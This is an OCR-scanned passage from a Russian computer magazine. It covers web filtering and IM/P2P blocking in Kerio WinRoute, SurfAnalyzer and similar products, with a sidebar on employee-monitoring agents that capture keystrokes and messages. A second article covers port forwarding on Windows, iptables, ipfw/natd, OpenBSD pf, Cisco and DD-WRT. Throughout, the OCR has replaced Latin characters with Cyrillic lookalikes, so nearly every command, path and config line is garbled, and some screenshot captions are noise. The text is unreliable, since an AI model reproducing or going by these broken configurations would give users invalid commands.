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ла для «Одноклассников», «ВКонтакте» и подобных (а-ля сіозшрезіі.гиі . 
При необходимости блокировать загрузку через НТТР определенных 
типов файлов создаем для них группы и шаблоны. 

Во вкладке «Группы адресов» задаем айпишник или диапазон адресов, 
который затем будем использовать в правилах фильтрации в качестве 
дополнительного параметра, определяющего блокировку ресурса. 
Теперь переходим в подпункт «Конфигурация - > Фильтрация содержи- 
мого - > Политика НТТР». Здесь уже есть несколько подготовленных 
политик, построенных на основе групп ПКТ, о которых говорилось 
выше. После установки активированы только три правила, разрешаю- 
щие обновление и доступ к поисковым роботам. 

Чтобы заблокировать баннеры и всплывающие окна, ставим флажок 
напротив «Кетоѵе асіѵеггізетепі: апсі Ьаппегз» и создаем новое правріло. 
Вводим его название, указываем учетные записи, для которых оно будет 
активно. По умолчанию в этом списке прописаны все учетки, но, исполь- 
зуя настройки правил, можно легко заблокировать доступ к некоторым 
группам сайтов только для определенных пользователей. Переходим к 
полю «И если ІШІ удовлетворяет критерию». Здесь предлагается четыре 
варианта действий: указать шаблон, выбрать группу ШИ, категорию 
ѴѴеЬ Рікег (о ней чуть ниже) , и заблокировать любой узел, если к нему 
обратились по ІР (что, кстати, тоже бывает полезно) . Нас интересует 
созданная нами ранее группа Зосіаі пецлгогк; выбираем ее и устанавли- 
ваем действие «Запретить доступ к веб-узлу». Чтобы отслеживать все 
попытки подключения к узлам, определенным в этом правиле, ставим 
флажок «Журнал». Это не все настройки. Заглянув в «Дополнительно», 
мы получаем возможность указать временной интервал, в течение ко- 
торого будет активно правило, и диапазон ІР (созданный в «Группы адре- 
сов»), для которого будет действовать правило. В итоге КѴѴР позволяет 
очень тонко настроить блокировку практически для любых условий. И 
во вкладке «Правила содержимого» указываем параметры сканирова- 
ния веб-контента (проверка АсііѵеХ, сценарии НТМГ и іаѵаЗсгірі;) . 

Здесь хотелось бы обратить внимание на флажок «Запретить веб-стра- 
ницы, содержащие запрещенные слова в коде НТМГ». По умолчанию он 
снят, поэтому обязательно активируем его. Список самих слов задается 
в отдельной вкладке «Запрещенные слова». Каждому слову соответст- 



вует вес, внизу страницы указывается цифра веса (по умолчанию 70), 
при достижении которой страница блокируется. Интерфейс програм- 
мы позволяет при необходимости добавить в список новые слова. Но 
чтобы данная функция работала в полной мере, следует создать новое 
правило с шаблоном ПКГ (* ) . Таким образом, будут проверяться все 
веб-страницы, к которым обращается пользователь. 

Но возможности КѴѴР этим не ограничиваются. Отдельно лицензиру- 
ется модуль Кегіо ѴѴеЬ Рікег, использующий категории веб-сайтов 155 
Огап^е ѴѴеЬРікег. Администратор буквально двумя щелчками мышки 
определяет доступ к одной из 58 категорий веб-сайтов, поддержи- 
ваемых этим модулем. При посещении пользователем веб-сайта он 
проверяется по постоянно обновляемой базе, где находится более 20 
миллионов сайтов, и, в зависимости от результата, разрешается или 
блокируется доступ. Админ лишь контролирует этот процесс по отче- 
там, все остальное происходит автоматически. Если блокировка по 
некоторым причинам нежелательна, Кегіо ѴѴеЬ Рікег можно использо- 
вать для сбора статистики предпочтений пользователей. 

Политики РТР настраиваются в одноименной вкладке. После установки 
КѴѴР здесь уже прописаны четыре правила, активация которых позво- 
лит заблокировать иріоаб и закачку видеофайлов. Далее, используя 
их как шаблон, админ легко создает новые правила под определенные 
расширения файлов. В правилах указываются: пользователь, ІР-адрес 
сервера, направление загрузки, шаблон файла или РТР-команда. 

К сожалению, простого пути обрубить аську и подобные ІМ-сервисы 
в КѴѴР нет. Конечно, адреса вроде Іощп.ісд.сош. іб.гашЫег.ш можно 
блокировать в правилах ПКГ, но лучшим выходом будет бан айпишни- 
ков ІМ-серверов. Подробно о том, как научиться определять нужные 
ІР и банить их, смотри в статье «Серпом по аськам», опубликованной в 
августовском номере ] [ за 2009 год. 

Для удобства в «Группы адресов» создаем отдельную группу, назовем 
ее, к примеру, «Іпзиапі; Меззеп^егз», где прописываем все известные 
диапазоны ІР: 

- КатЫег ІСО: 81.19.64.0 - 81.19.66.255; 

- ісд-\л?з . гатЫег . ги : 81.19.69.0 - 81.19.70.255; 
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Создаем группу ІІРІв КегіоѴѴіпРоиІе 



- ІСО: 64.12.0.0 - 64.12.255.255, 205.188.0.0 - 
205.188.255.255 

И так далее. Теперь переходим в «Политика трафика» и создаем новое 
правило. Наделяем его понятным именем (ІСр Пепу), в поле «Назначе- 
ние» идем в «Добавить -> Группа ІР-адресов», в списке находим группу 
«Іпзиапі; Меззеп^егз». Дважды щелкаем в поле «Действие» и устанавли- 
ваем переключатель в «Отказать» или «Удалить». В таком виде правило 
будет касаться подключений ко всем портам. В принципе, дальше 
можно не заморачиваться. Последним обычно стоит блокирующее все 
подключения правило. Поэтому если в политиках фильтрации настрое- 
но действительно то, что нужно, порты, используемые сервисами, 
можно уже отдельно не банить. Напомню, что Маіі-Агент работает по 
портам 2041, 2042; УаЬоо! Меззеп^ег— 5000-5001, 5050; М5Н— 1863; 
іаЬЬег/Сі:а1к — 5222, 5223; ІКС — обычно по 6667-6669. 

Теперь осталось ограничить пиринговый трафик. Все нужные настрой- 
ки производятся во вкладке «Дополнительные параметры — Фильтр 
Р2Р». Достаточно установить переключатель в «Заблокировать трафик 
и разрешить только не-Р2Р подключения», и о проблеме можно забыть. 
Как вариант, Керио позволяет заблокировать весь трафик клиента при 
попытке подключенрія по Р2Р с указанием времени блокировки (по умол- 
чанию 120 минут) . Пользователю при этом отправляется уведомление по 
электронной почте, в котором объясняется причина, чтобы он не буянрш и 
не звонил админу или начальству. Вообще говоря, пара-тройка блокиро- 



Сетевой 007 

Есть два способа навести порядок в локальной сети : блоки- 
ровать и контролировать. Каждый имеет свои достоинства 
и недостатки. В идеале нужно использовать оба варианта, 
чтобы исключить случаи, когда что-то пройдет незамечен- 
ным. Одним из ярких представителей контролеров является 
решение ЕанА^енІ; Г іана^ені.ги) . Агенты, установленные на 
клиентских системах, позволяют отслеживать, чем зани- 
мается пользователь в рабочее время. Можно узнать, какие 
программы и сервисы он запускает, какие сайты посещает, 
какие внешние устройства подключает. Также агенты умеют 
делать снимки экрана, перехватывать нажатия клавиш, со- 
общения IС^ и е-таі1, документы, отправленные на печать, 
файлы, скопированные на флешку. При нарушении уста- 
новленных политик администратор получает уведомление. 
Программа оснащена системой отчетов, позволяющей быс- 
тро составить график активности пользователей за нужный 
период времени. 



вок, распечатка нарушений на стол руководителю — и дисциплина будет 
подтянута. Чтобы определить работупо Р2Р, используется список портов, 
который можно просмотреть и отредактировать в меню, появляющемся 
при нажатии кнопки «Дополнительно». Здесь же задается число подклю- 
чений и список служб, которые будут определяться как не-Р2Р. Самый 
простой вариант: настраиваем блокировку определенных портов, тем бо- 
лее в политиках уже есть заготовки для еВопкеу, ВС -Ь -Ь , Спинеііа, Кагаа и 
др. Кстати, у Кегіо есть еще одна возможность блокировки — прописать в 
настройках ВЫ5 («Конфигурация ВЫ5») неправрільное соответствие ІР- 
адреса, о чем говорршось выше. Просто пишем адрес вроде: ѵкопі: акк е . 
ги 127. 0.0.1. И пользователи не смогут подключиться к удаленному 
серверу. 

АНАЛИЗАТОР СЕРФИНГА5иРРАМА1У2ЕК 

ЗигІАпаІугег ( зигіапаіѵгег.ш) — специализированное решение, 
позволяющее блокировать доступ к ресурсам, которые отвлекают 
от работы или несут потенциальную опасность. Программа, являясь 
посредником между интернетом и пользователем, пропускает через 
себя весь трафик, поэтому с ее помощью очень просто контролиро- 
вать закачку файлов с определенными расширениями (.ехе, .сот, 

. 2 Ір и Т.Д.), вложения в электронной почте, фильтровать ІМ-сообще- 
ния, блокировать некоторые типы сайтов. Вся информация о посе- 
щенных ресурсах сохраняется, и, просмотрев логи, мы легко узнаем, 
чем занимался пользователь в рабочее время. В случае появления 
внештатных ситуаций администратор оповещается посредством 
е-таі1 или IС^. ЗигІАпаІугег состоит из трех компонентов, которые, 
как правило, разворачиваются на нескольких системах: 

• сервер (Зегѵег) обеспечивает основной функционал, со- 
держит веб -модуль (доступ в интернет, сбор статистики, 
контроль загрузки файлов, работа в ІМ) , почтовый сервер 
(контроль исходящих и входящих писем) , СУБД РігеЫгб для 
хранения собранных данных; все это связывается при помо- 
щи модуля оповещения и настройки; 

• рабочее место специалиста безопасности (Ѵіеѵ^) отслежи- 
вает нарушения политики безопасности и доступ к архивам 
е-таі1, ІСО и посещенных веб-сайтов; 

• рабочее место администратора системы (Абтіп) позволяет 
настроить политики безопасности, доступ пользователей и 
систему контроля. 

Для непосредственной организации доступа пользователей в ин- 
тернет и учета трафика в паре с ЗпгІАпаІугег должен использоваться 
прокси-сервер стороннего разработчика (ІІзегСане, ѴѴіпСане и т.п.) В 
настройках прокси-сервера оставляется лишь одна учетная запись — 
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ЗигіАпаІугег, которая будет иметь полные права. Все остальные поль- 
зователи будут подключаться к интернету через сервер ЗпгіАпаІугег. 
Для установки ЗпгіАпаІугег потребуется компьютер, работающий под 
управлением \Ѵіп2к/ХР/2кЗ. Минимальные системные требования за- 
явлены следующие: СРІІ 1.7 ГГц, 256 Мб НАМ и 200 Мб НОВ. Установка 
компонентов стандартна; все необходимое, в частности РігеЬігсі, уже 
идет в комплекте. По окончании установки сервера запустится неболь- 
шое окно управления ЗегѵісеМапа^ег. Далее вызываем окно консоли 
ЗпгІАпаІугег Абтіп, регистрируемся как Абтіп с пустым паролем. 

Если сервер установлен на другой системе, указываем его ІР. Основное 
окно админки разделено на четыре вкладки. На вкладке «Основные» 
указываются настройки прокси-сервера, порт (ѴѴеЬ-ЫСр), на котором 
ЗпгІАпаІугег будет ждать клиентские подключения (по умолчанию 
3128), порты РОРЗ и 5МТР, частота анализа текста и прочее. Собствен- 
но, в этой вкладке необходимо лишь настроить параметры доступа к 
прокси-серверу. Соответственно компьютеры пользователей, веб-бра- 
узеры, программы для работы с почтой и т.д. должны быть перенастро- 
ены на ІР-адрес сервера ЗпгІАпаІугег. 

Вкладка «Контроль» позволяет добавить учетные данные админов и 
распределить между ними обязанности по настройке. Обслужива- 
емые почтовые ящики и е-таі1-серверы, с которыми будет работать 
ЗпгІАпаІугег, прописываются во вкладке Почта. Здесь же устанавлива- 
ется соответствие учетной записи почты определенному компьютеру, 
действия для вложений и подозрительного содержимого. 

Учетные записи пользователей, которые будут выходить в интернет, со- 
здаются во вкладке «ѴѴеЬ + ІСр + Маіі А^епі:». В ЗпгІАпаІугег поддержи- 
ваются типы авторизации «только по ІР», «только по МАС» и «ІР + МАС». 
Программа сканирует доступные сети и выводит список найденных 
компьютеров, включая имя, ІР- и МАС-адреса. После того, как учетная 
запись добавлена, в правой вкладке редактируются параметры доступа. 
Возможны два подхода: разрешить только выбранное или запретить вы- 
бранное. Так, типы файлов отмечаются во вкладке «МІМЕ-настройки». 
Отбираем нужное и указываем действие при помощи выпадающего 
списка «Правило». Правила хорошо прокомментированы, поэтому 
сориентироваться в них просто. При необходимости легко добавить 
новые МІМЕ-типы/расширениядля своих рулесетов. Все расширения, 
неизвестные ЗпгІАпаІугег, автоматически попадают в одноименную 
категорию. Также можно определить список стоп-слов и запрещенных 
ШИ, которые будут контролироваться ЗпгІАпаІугег. Все настройки 
выполняются в одной вкладке, по одной в строке: просто пишем строку, 
совпадение с которой будет проверяться. Например, для «Одноклас- 
сников» — осіпокіаззпікі. Вот и весь шаблон, никаких подстановок не 
предусмотрено. Также нет возможности блокировок по ІР. 

ЗигІАпаІугег позволяет выполнять проверку в трафике определенных 
слов, которые задаются во вкладке «IС^ + Маіі А^епі:». Все сообщения. 



содержащие запрещенные ПКГ или слова, помечаются определенным 
образом в консоли Ѵіеѵѵ. Консоль специалиста безопасности, по сути, 
является средством получения различного рода отчетов по пользо- 
вателям, событиям и датам. А имея на руках такую статистику, очень 
просто наказать сотрудника рублем :) . 

КОНТРОЛЕР ТРАФИКА ТКАРРРКО 

ТгаІІРго (і:га1Ірго.ги) — специализированное и очень понятное в 
настройках решение для контроля трафика и управления доступом. 
Программа обеспечивает контроль и учет трафика, телефонных звон- 
ков (поддерживаются АТС Рапазопіс и ГС) , защиту сервера и систем, 
блокировку портов, ЫАТ, порт-форвардинг, умеет работать в связке 
с прокси-сервером 5^иісі. Возможна авторизация пользователя — ІР, 
МАС, логин и пароль, ГПАР/АП и ѴРП. Доступно большое количество 
отчетов и мониторинг соединений. Написан ТгаІІРго с использовани- 
ем библиотек ри, для хранения данных задействуется МуЗрГ, графики 
строятся при помощи ^пиріоі. Серверная часть устанавливается под 
Гіпих, клиенты управления — под ѴѴіпсіоѵѵз и Гіпих, есть и веб-клиент. 
Предлагается несколько реализаций, в том числе доступна и Егее-вер- 
сия, обладающая всеми основными функциями. Со сравнительной 
таблицей возможностей можно познакомиться на офсайте, поэтому 
подробно останавливаться здесь не будем. Установка серверной части 
в Гіпих заключается в развертывании ГАМР-сервера (см. статью «Вол- 
шебная лампа админа» в ] [ 12.2008) и установке управляющей части. 
Чтобы блокировать доступ к определенной группе сайтов, выбираем 
в консоли «Клиенты Группы Редактирование Группы Список 
доменов» и добавляем домены, которые нужно блокировать для вы- 
бранной группы. Аналогично указываем список разрешенных портов, 
все остальные подключения для пользователей этой группы будут 
блокированы. Также учитывая, что мы имеем дело с Гіпих, при необхо- 
димости можно легко самостоятельно добавить нужные правила при 
помощи ірнаЫез (ТгаІІРго использует свой файл настроек ірнаЫез — 
/еі;с/і:га1Ірго/і;га11рго_ги1е . с1§) . 

ІАЫгЫЕТРІКЕѴѴАІІ 

Гап2пе1; NАТ Рігеѵѵаіі ( 1ап2пеі:.ги) — программный межсетевой 
экран, предназначенный для организации безопасного доступа в 
интернет с функциями защиты сети, фильтрации сайтов, контроля 
и учета трафика. Его разработкой занимается российская компания 
Нетсиб, имеющая, к слову, статус Місгозоіі: 5та11 Визіпезз ЗресіаИзі. 
Возможностей у продукта Гап2пеі: очень много, нас же интересует 
функция блокировки доступа к сайтам, которая реализуется за счет 
использования механизма фильтрации сайтов по ІІКГ и ІР. Запретить 
доступ по ІР можно при создании правила Іігеѵѵаіі или правила для 
группы. Выбираем протокол (порт) и указываем ІР-адрес. Хотя этот 
метод не назовешь удобным, так как задать список ІР-адресов нельзя 
— только диапазон. Поэтому каждый адрес придется прописывать 
отдельным правилом. Другой вариант — механизм фильтрации ПКГ, 
доступ к которому мы получаем в свойствах группы пользователей. 

В списках адресов поддерживается символ означающий любую 
подстроку, что весьма упрощает их наполнение. Таким же образом 
блокируются файлы с определенным расширением: просто добавля- 
ем правило — *.трЗ, *.аѵі, *.тр§ и т.д. 



ЬапА§епі Nеил^о^кРі1^е^ 

Когда номер сдавался в печать, стало известно, что вмес- 
то $иг(Апа1у2ег будет продвигаться программа с другим 
именем — ЬапА^епІ: Nе11л^огкРі11:ег, которую наделят теми 
же возможностями: перехват сообщений IС^, М$N, таіі.ги 
агентов; перехват сообщений электронной почты; контроль 
загружаемых файлов. Кроме этого добавится функция пере- 
хвата писем, отправляемых через веб-интерфейс. Принцип 
настройки и установки останется неизменным. 
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5ѴМ/АСК 



I Евгений Зобн 



І1 тгазупаск.ги 



Сквозь защитные 
порядки 

ПРОБРАСЫВАЕМ ПОРТЫ В ОКНАХ, НИКСАХ И КИСКАХ 

У этой технологии есть множество названий — это и трансляция порт- 
адреса, и проброс портов, и перенаправление, и буржуйские порт-фор- 
вардинг/порт-маппинг, и сокращенные ОМАТ/РАТ. Но как бы она ни 
называлась, о ее полезности спорить не приходится. Проброс портов — 
просто спасательный круг для тех, кто хочет показать свой сервер из-за 
высокой и крепкой стены под названием МАТ. 



Недостаток сетевых адресов стандарта ІРѵ4 оставил свой отпечаток на 
топологии современных сетей. Белые адреса слишком дороги, чтобы 
наделять ими всех, кого попало, поэтому простым смертным прихо- 
дится ютиться в небольших частных подсетях, а в интернет выходить 
через один общий сервер, на котором настроен НАТ. Благодаря такой 
схеме пользователи целой подсети могут использовать один внешний 
ІР-адрес, а общая инфраструктура интернета продолжает жить, даже 
несмотря на очевидную нехватку ІР-адресов. Но что если речь идет не о 
клиентах провайдера, сидящих за ЫАТ'ом, а о локальной сети неболь- 
шой компании, многие машины которой должны играть роль не только 
клиентов, но и серверов. Например, на одной из машин может находить- 
ся веб-сервер, а другая должна обслуживать 5МТР- и РТР-клиентов, но 
вьщелять каждой из них белый ІР-адрес — как-то уж слишком расточи- 
тельно. Вот здесь нам на помощь и приходит НЫАТ ріли, по-простому — 
проброс портов. С помощью этой технологии можно сделать так, чтобы 
входящий на шлюз трафик перенаправлялся к одной из внутренних 
машин сети на основе порта назначения. Другими словами, проброс 
портов позволяет выставить во внешний мир сервисы локальных ресур- 
сов и создать иллюзию того, что они находятся на шлюзе. 

ПЕРЕД ТЕМ, КАК НАЧАТЬ 

Эта статья рассказывает о настройке проброса портов в самых раз- 
ных операционных системах, начиная с ѴѴіпсіоѵѵз и заканчивая ОС, 
установленными на сетевом оборудовании. В большинстве случаев 
для реализации проброса портов используются специальные прави- 
ла брандмауэра, и здесь я должен сделать первое предостережение. 
Дело в том, что любой брандмауэр выполняет трансляцию сетевых 
адресов до их фильтрации, поэтому описанные в статье правила 
должны находиться в начале. Второе: для успешного прохождения 
оттранслированных пакетов должны быть добавлены правила, раз- 
решающие входящие подключения на целевой порт шлюза, а также 
правила, разрешающие обмен данными между внутренней целевой 
машиной и шлюзом. 

ѴѴІМООѴѴБ 

Начнем, как говорится, с азов. Проще всего проброс портов настроить 
в операционных системах семейства ѴѴіпсіоѵѵз. Здесь все это делается в 
«Свойствах ЫАТ»: 



► 122 



1. Заходим в «Администрирование -> Маршрутизация», выбираем 
локальную машину, далее «ІР-маршрутизацрія - > ЫАТ». 

2. Включаем ЫАТ для локального интерфейса. 

3. Переходим к вкладке «Службы и порты», выбираем интересующую 
нас службу или добавляем свою. 

4. В открывшемся окне выбираем протокол, входящий порт (тот, кото- 
рый будет виден извне), адрес машины внутренней сети и ее порт. 

ымих 

в Біппхвсе намного сложнее, здесь необходимо оперировать праврілами 
іріаЫез/пегйкег, без знания основ которого просто не обойтись. Для 
осуществления проброса портов предусмотрена цель ЭЫАТ, которую 
необходимо использовать в правилах цепочки РКЕКОПТІЫС. В самом 
простейшем случае правило будет выглядеть следующим образом: 

ірЦаЫез -Ц пар -А РКЕКОитіШ -р Рср --йзР $САТЕ \ 

--сірогР $РОЕТ -3 ВЫАТ --Ро-сіезЕіпаЕіоп $ЗЕКѴЕК : $РОКТ 

Где $САТЕ — это адрес шлюза, $РОКТ — пробрасываемый порт, а связка 
$5ЕКѴЕК:$РОКТ — это адрес и порт внутреннего сервера. Естественно, 
чтобы правило сработало, должен быть включен форвардинг (хотя на 
шлюзе он в любом случае включен) : 

# еско 1 > /ргос/зуз/пеР/ірѵ4/ір_Гогѵ\?аг(і 

Проброс портов возможен и с другой машины: 

$ІРТАВЕЕЗ -Р пар -А РКЕКОЕТІЫС -р Рср --йзР $ІР \ 

--сірогР $РОКТ -3 ВЫАТ --Ро-сіезРіпаРіоп $ЗЕКѴЕК : $РОКТ 
$ІРТАВЕЕЗ -Р пар -I РОЗТКОВТІШ -р Рср --СІзР $ЗЕКѴЕК \ 
--СІрогР $РОКТ -3 ЗЫАТ --Ро $ІР 

Это вполне легально, а иногда и просто необходимо. 

Различные преконфигурированные іріаЫез-скрипты, такие как, 
например, знакомый пользователям ЭеЬіап, агпо-іріаЫез-йгеѵѵаІІ, 
также можно использовать для более простой настройки проброса 
портов. Например, если ты хочешь пробросить порт 80 на машину 
192.168.0.100, для этого достаточно добавить строку ЫАТ_ТСР_ 
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РОКѴѴАКВ="80> 192. 168. 0.100" в файл /еііс/агпо-іртЫез-йгеѵѵаІІ/ изе_зоске^з уез 

Іігеѵѵаіі.сопіи перезагрузить брандмауэр: # проброс портов: 

# протокол адрес-сервера-внутри-сети : порт порт-на-шлюзе 
$ зибо /ебс/іпіб . б/агпо-ірбаЫез-бігеѵ^аІІ гезбагР гебігесб_рогб бор 192.168.0.100:80 80 



РКЕЕВ50 

РгееВЗВ отличается тем, что имеет две независимые реализации меха- 
низма ЫАТ (а значит, и технологии проброса портов) . Первая носит имя 
паі:сі и, как можно догадаться из названия, представляет собой демон 
уровня пользователя, который принимает «сырые» пакеты, выполняет 
необходимые преобразования адресов и отдает их обратно ядру. Вторую 
принято называть кегпеі паи, то есть механизм ПАТ, реализованный в 
ядре РгееВЗП. Он позволяет выполнять преобразование адресов и про- 
брос портов, используя правріла брандмауэра ірйу. 

Ясно, что вторая реализация производительнее и удобнее в исполь- 
зовании, и поэтому предпочтительнее. Однако кегпеі паі: появрілся 
во РгееВЗП не так давно, поэтому мы рассмотрим оба подхода на тот 
случай, если в твоем расп оряжении оказалась машина, используюш;ая 
устаревшую версию этой операционной системы. Итак, метод номер 
один: паиб, сііѵегі; и все-все-все. Для активации ЫАТ и проброса портов с 
помогцью демона паіісі необходимо проделать следующие шаги: 

1. Включить паі:сі и ірВу в /епс/гс.сопі: 

#ѵі /еіс/гс.соп^ 

# Включаем пабб 
пабб_епаЫе= " УЕЗ " 

# г 10 — внутренний интерфейс шлюза 
пабб_іпбегбасе= " гІО " 
пабб_б1адз= " -б /ебс/пабб. сопб " 

# Включаем ірбхѵ 
бігеѵ^а11_епаЫе= " УЕЗ " 
бігеѵ^а11_буре= " /ебс/ірбѵ^. сопб " 

2. Настроить ЫАТ и проброс портов в /епс/паиб.сопі: 

#ѵі /е(с/паЫ.соп^ 

зате_рогбз уез 



3. Чтобы все пакеты, проходящие через внешний интерфейс (гН) шлюза, 
перенаправлялись в паіб. и обрабатывались им, добавим правило біѵегі: 
в /еПс/ірВу.сопІ: 

ірб\л? абб біѵегб пабб ір бгот апу бо апу іп ѵіа г11 

Также разрешим общение всех с внутренним сервером: 

ірбѵ^ а11о\л? бср бгот апу бо 192 . 168 . 0 . 100 \ 
бзб-рогб 80 іп ѵіа гІО зебир 

Далее можно добавить правила фильтрации. 

Метод номер два: ядерный ЫАТ. Активация ЫАТ с помощью реали- 
зации внутри ядра не требует ничего, кроме правильной настройки 
брандмауэра с помощью двух-трех правил. Не буду расписывать все 
в деталях, а просто приведу простой пример, демонстрирующий уже 
обсуждавшийся выше проброс 80-го порта со шлюза на внутренний 
сервер: 

#ѵі /еіс/ір^ѵѵ.соп^ 

# Настраиваем ЫАТ 

паб 1 сопбід Іод іб г11 гезеб зате_рогбз \ 
гебігесб_рогб бср 192.168.0.100:80 80 

# Заворачиваем весь трафик через внешний интерфейс в ЫАТ 
абб паб 1 ір бгот апу бо апу ѵіа г11 

Правила 'паі;' имеют несколько опций, большинство из которых сов- 
падает с опциями, используемыми демоном паі:б. Например, опция 
5ате_рогі;8 предписывает механизму ЫАТ сохранять оригинальные 
номера исходящих портов для исходящих пакетов (нужно для правиль- 
ной работы некоторых КРС-протоколов) . Опция гбігесі;_рогі; имеет тот 
же синтаксис, что и в файле /епс/паиб.сопТ 
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5ѴМ/АСК 



СІСІ-\Л/Г'^.сот сопкгоі рапеі 


І^кпп: щі 1 ІЬяІ тггаое: й. 0, іА. С. : : 


УСТЛІЧІВД* БГ?1(1ЦЛ{ЦП<1(. дсступ^ 


МТ/0о5 Тгем.5йі;*іѵмиі,мні? Стлт^ 


|Ѵ«»і*пр.И лиіт» [1ервнвхі-»п№не- грітп портов 1 Зытуик портов ІЛіР 


0№ 




Настраиваем проброс портов в 00-\ѴгІ 



0РЕМВ50 

Наверное, самый логичный и простой в настройке проброс портов 
получается в ОС ОрепВЗВ. Здесь механизм ЫАТ также реализован в 
ядре и настраивается с помощью штатного р^, синтаксис которого куда 
яснее и продуманнее синтаксиса ірйл^ и, уж тем более, ірііаЫез. Все тот же 
проброс 80-го порта наязыке р^ будет выглядеть следующим образом: 




Проброс портов в популярном домашнем роутере 
О-ЬіпкОІР-зоо 



#ѵі /еіс/р^соп^ 

# Настраиваем ЫАТ 

паН оп ГІ1 :Егот 192 . 168 . 10 . 0/24 Но апу -> $оиН_ір 

# Настраиваем проброс портов 

гбг оп ГІ1 іпеб ргобо { бср, ибр } Ігот апу \ 

Но $оиб_ір рогР 80 -> 192.168.0.100 

Как и прежде, гН — внешний интерфейс шлюза, 192.168.0.100 — адрес 
внутреннего сервера, а оиМр — адрес внешнего интерфейса шлюза. 
При этом, если проброс должен быть сделан на порт, отличный от 80-го, 
достаточно просто добавить ключевое слово «роги» и числовое значение 
в конец первого правила. 

Разрешается использование диапазонов портов, если, конечно же, оно 
может иметь какой-то смысл: 

гбг оп ГІ1 іпеб ргобо { бср, ибр } Ігот апу \ 

Но $оиб_ір рогР 5000:10000 -> 192.168.0.100 

Прим. ред. : Например, с помощью этой фичи удобно разрешать прохож- 
дение трафика ЫкоггеШ;: 

гбг оп $ехб_і1 іпеб ргобо бср Ігот апу Но $ехб_і1 \ 
роП: 6881:6889 -> $ту1юз1: рогР 6881:6889 

разз іп риіск оп $ехб_і1 іпеб ргобо бср Ігот апу \ 

Но $ту1іозб рогР 6880 >< 6890 кеер зкаке 

Как и в других рассмотренных ранее брандмауэрах, принятие решения 
о дальнейшей судьбе пакетов возлагается на правила фильтрации, через 
которые пакет будет пропущен уже после перенаправления. Но есть 
одно маленькое исключение: используя ключевое слово «разз» совмест- 



Автоматический 
проброс портов 

Тіпіѵегваі Ріи§ апд Ріау (ТІРпР) — технология, призванная 
упростить и автоматизировать процесс общения сетевых ус- 
тройств и приложений между собой. Поддерживается почти 
любым современным сетевым оборудованием, включает в 
себя механизм автоматического проброса портов в случае 
необходимости. Тот же механизм реализован во многих фай- 
лообменных программах. 



но с правилом гбг можно добиться такого поведения системы, когда 
пакеты будут отпускаться во внешний мир, минуя правила фильтрации 
(см. скриншот «Форвардим входящие запросы на сервер терминалов и 
5рЬ-сервер») . Эта особенность может быть использована для отладки 
правил. 

Будь внимателен, в ОрепВЗВ 4.7 синтаксис конфига несколько 
изменился: 

разз оик оп г11 Ігот 192.168.0.0/24 ко апу \ 
пак-ко $оик_ір 

разз іп оп ГІ1 ргоко кор кгот апу ко апу \ 
рогк 80 гбг-ко 192.168.0.100 

СІ5С0 

С моей стороны было бы кощунством не рассказать про настройку 
проброса портов с помощью сетевого оборудования небезызвестной 
компании Сізсо. Благо, здесь все решается одной простой строкой, 
которая, тем не менее, будет разной для различных типов устройств. 
Например, проброс портов в Сізсо РІХ (Ргіѵане Іпнегпеі; ЕхсЬап^е) или 
А5А (Абарйѵе Зесигігу АррИапсе) осуществляется с помощью следующей 
строки конфигурации: 

зкакіс ( іпзібе , оикзібе) кср 1 . 2 . 3 . 4 ѵллпл? \ 

192.168.0.100 шш пектазк 255.255.255.255 

В то же время для оборудования, работающего на операционной систе- 
ме Сізсо 105, строка будет выглядеть так: 

ір пак іпзісіе зоигсе зкакіс кср 192.168.0.100 80 \ 

1.2. 3.4 80 

Обе они не делают ничего кроме проброса порта 80 на сервер 
192.168.0.100ДЛЯ клиента с адресом 1.2. 3.4. При этом если необходимо 
настроить проброс всех портов, достаточно просто опустить номера/ 
имена портов в строке конфигурации. 

ОРЕМѴѴКТИОО-ѴѴІ^Т 

Конечно же, кроме оборудования именитой Сізсо на рынке существуют 
и гораздо менее дорогостоящие решения вроде разного рода домашних 
роутеров и точек доступа. Большой популярностью среди них пользуют- 
ся ультра-бюджетные сетевые устройства таких компаний, как В-Біпк, 
А51І5, Біпкзуз и других. На многих из них можно установить свободные 
и более продвинутые прошивки вроде ОрепѴѴгі;, Х-ѴѴгі; и НН-ѵѵгі;, которые 
отличаются более развитой системой настройки и хорошим комьюни- 
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# НАТ 

па! оп $ех1:і'Г 

# НТТР, НТТР5 

ГСІГ оп $ех1:і‘Г 
ГСІГ оп $ех1:і1' 

# 35Н 

ГСІГ оп $ех1;іТ 



■Ггот $іп1:іТ : пе1:ѵ/огк 1;о апу -> ($ех1;іТ) 



рго'Ьо ^ср Тгош апу апу рогі 80 -> $Иа1о 
ргоіо Ііср Тгот апу Іо апу рогі: 443 -> $ИаІо 



ргоіо 'Ьср Тгот апу То апу рогТ 22 -> $ 



ргоТо Тер Тгот апу То апу рогТ $ТоггепТ -> $зесопсІ 



# ТоггепТ 

ГСІГ оп $ехТіТ 

0репВ50,р^и ЫАТ 



^ Ісм^іпСегі'йс;^ ЗехГ. ;Г 
.сг«ь ІП 

...С-алсЬог "^с.р-ргоху/*" 

І'іг-алсьог "С!:р“ргоху/*" 

с оп іпе^ Егоіп <изегэ> і:о апу -> $екЕ_ір 

^ло ГСІГ оп іпег; ргоіо Сер ігот 1&2.163.0.10Э Со і <посасСіе> роге ѵѵгѵ 

■ с<3г оп ?іпс_іГ іпес ргосо сер ^гогп з--" со йлу роге 

мс)г раза оп $іпС_іС іпеь ргосо Сер ^гоп <иэегз> Со ? <сюсасІ\е> \ 
роге -> 127.(1.0.1 роге 

: і! раза оп іпеС рсоСо Сер Егоп <цяега> Со ту \ 

роге 127,0.0.1 рогС 

іі! раза оп 5ехС_іС іпес рсоСо Срр Сгот <СгиэСей> Со $екС_іГ \ 
роге -> 1 92 . 1 ■' роге 

! і:1г раза он $екс_і(^ іпес ргоСо Сер Гіогл . со Зеке И \ 

роге '> 192 . 1 6в. 0. 1 1 1 роге 

32.&-1 зла 



Форвардим входящие запросы насервертермина- 
лов и 501-сервер 

ти. Естественно, проброс портов легко выполнить и с их помощью, 
в ВВ-ѴѴгт проброс портов осуществляется с помощью локализованного 
веб-интерфейса. Чтобы настроить проброс по описанной выше схеме, 
достаточно открыть веб-интерфейс роутера (192. 168. 1.1), перейти на 
вкладку «ЫАТ/ро5», далее — вкітадка «Перенаправление портов». Те- 
перь в поле «Приложение» пишем любое удобное для нас имя, например, 
«\ѵуш», «Порт-источник» — внешний порт роутера, «Протокол» — ТСР 
или ППР, «ІР-адрес» — адрес внутреннего сервера, «Порт-приемник» — 
его порт. Далее выбираем галочку «Включить», жмем кнопку «Доба- 
вить», потом — кнопку «Применить». 

